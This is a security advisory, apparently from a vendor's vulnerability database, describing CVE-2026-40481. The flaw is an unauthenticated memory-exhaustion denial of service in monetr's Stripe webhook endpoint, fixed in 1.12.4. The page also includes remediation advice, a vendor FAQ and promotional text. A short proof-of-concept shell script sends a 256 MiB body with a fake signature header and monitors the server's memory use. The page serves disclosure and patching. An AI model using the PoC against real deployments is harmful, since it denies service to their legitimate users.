CVE-2026-40481

CVE-2026-40481 is a high-severity uncontrolled resource consumption vulnerability in github.com/monetr/monetr (go), affecting versions <= 1.12.3. It is fixed in 1.12.4.

Summary

The public Stripe webhook endpoint fully reads the request body into memory before validating the Stripe signature. A remote unauthenticated attacker can send oversized POST bodies and cause substantial memory growth, leading to denial of service.

Details

When Stripe webhooks are enabled, the Stripe webhook route is reachable without authentication. The handler only requires that a Stripe-Signature header be present, then buffers the entire request body in memory and only afterward attempts Stripe signature verification.

Because body buffering happens before signature validation, memory consumption is controlled by the attacker-supplied payload size even when the signature is invalid. Large requests or repeated requests can exhaust available memory and make the service unresponsive or crash.

This issue depends on Stripe webhooks being enabled. If an upstream proxy or load balancer already enforces a strict request-body limit smaller than the attacker payload, exploitability is reduced accordingly.

PoC

URL="http://127.0.0.1:4000/api/stripe/webhook"
PROC_NAME="monetr"
TOTAL_KIB="$(awk '/MemTotal:/ {print $2}' /proc/meminfo)"

python3 - <<'PY' | curl -s -o /dev/null \
  --limit-rate 10m \
  -H 'Stripe-Signature: t=1,v1=deadbeef' \
  --data-binary @- \
  "$URL" &
import sys
sys.stdout.buffer.write(b"A" * (256 * 1024 * 1024))
PY
REQ_PID=$!

while kill -0 "$REQ_PID" 2>/dev/null; do
  ps -C "$PROC_NAME" -o rss=,%cpu= | awk -v total="$TOTAL_KIB" '
    {
      printf "%s mem=%.2fMiB / %.3fGiB cpu=%s%%\n", "'"$PROC_NAME"'", $1/1024, total/1024/1024, $2
    }
  '
  sleep 1
done

wait "$REQ_PID"
# monetr mem rises substantially while processing the invalid webhook body before signature validation fails

Impact

  • Type: Denial of service / uncontrolled resource consumption (CWE-400)
  • Who is impacted: Internet-reachable monetr deployments that have both Stripe billing and Stripe webhooks enabled
    (Stripe.Enabled and Stripe.WebhooksEnabled). In practice this is the hosted/SaaS configuration. Self-hosted instances
    are very unlikely to be affected, because Stripe billing is opt-in, is not part of a typical self-hosted setup, and
    the webhook route short-circuits to 404 when it is not enabled; meaning the unbounded read is unreachable on a default
    self-hosted deployment.
  • Security impact: A remote, unauthenticated attacker can cause the monetr server process to buffer attacker-controlled
    payloads into memory before any signature validation occurs. Sufficiently large or repeated requests can drive memory
    consumption high enough to make the API unresponsive or crash the process, denying service to all legitimate users of
    the affected instance, not just users of the billing surface.
  • Attack preconditions: The attacker must be able to reach the /api/stripe/webhook endpoint over the network and the
    target instance must have Stripe webhooks enabled. No authentication, prior account, user interaction, or knowledge of
    the Stripe webhook secret is required. Exploitability is reduced (and may be effectively eliminated) on deployments
    where an upstream proxy or load balancer enforces a request-body size limit smaller than the attacker's payload.

Crafted input forces the application to consume excessive CPU, memory, or other resources, degrading or denying service. Typical impact: denial of service.

CVE-2026-40481 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.12.4); upgrading removes the vulnerable code path.

Affected versions

github.com/monetr/monetr (<= 1.12.3)

Security releases

github.com/monetr/monetr → 1.12.4 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/monetr/monetr to 1.12.4 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-40481? CVE-2026-40481 is a high-severity uncontrolled resource consumption vulnerability in github.com/monetr/monetr (go), affecting versions <= 1.12.3. It is fixed in 1.12.4. Crafted input forces the application to consume excessive CPU, memory, or other resources, degrading or denying service.
  2. How severe is CVE-2026-40481? CVE-2026-40481 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/monetr/monetr are affected by CVE-2026-40481? github.com/monetr/monetr (go) versions <= 1.12.3 is affected.
  4. Is there a fix for CVE-2026-40481? Yes. CVE-2026-40481 is fixed in 1.12.4. Upgrade to this version or later.
  5. Is CVE-2026-40481 exploitable, and should I be worried? Whether CVE-2026-40481 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-40481 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-40481? Upgrade github.com/monetr/monetr to 1.12.4 or later.

Other vulnerabilities in github.com/monetr/monetr

CVE-2026-41644CVE-2026-39901

Stop the waste.
Protect your environment with Kodem.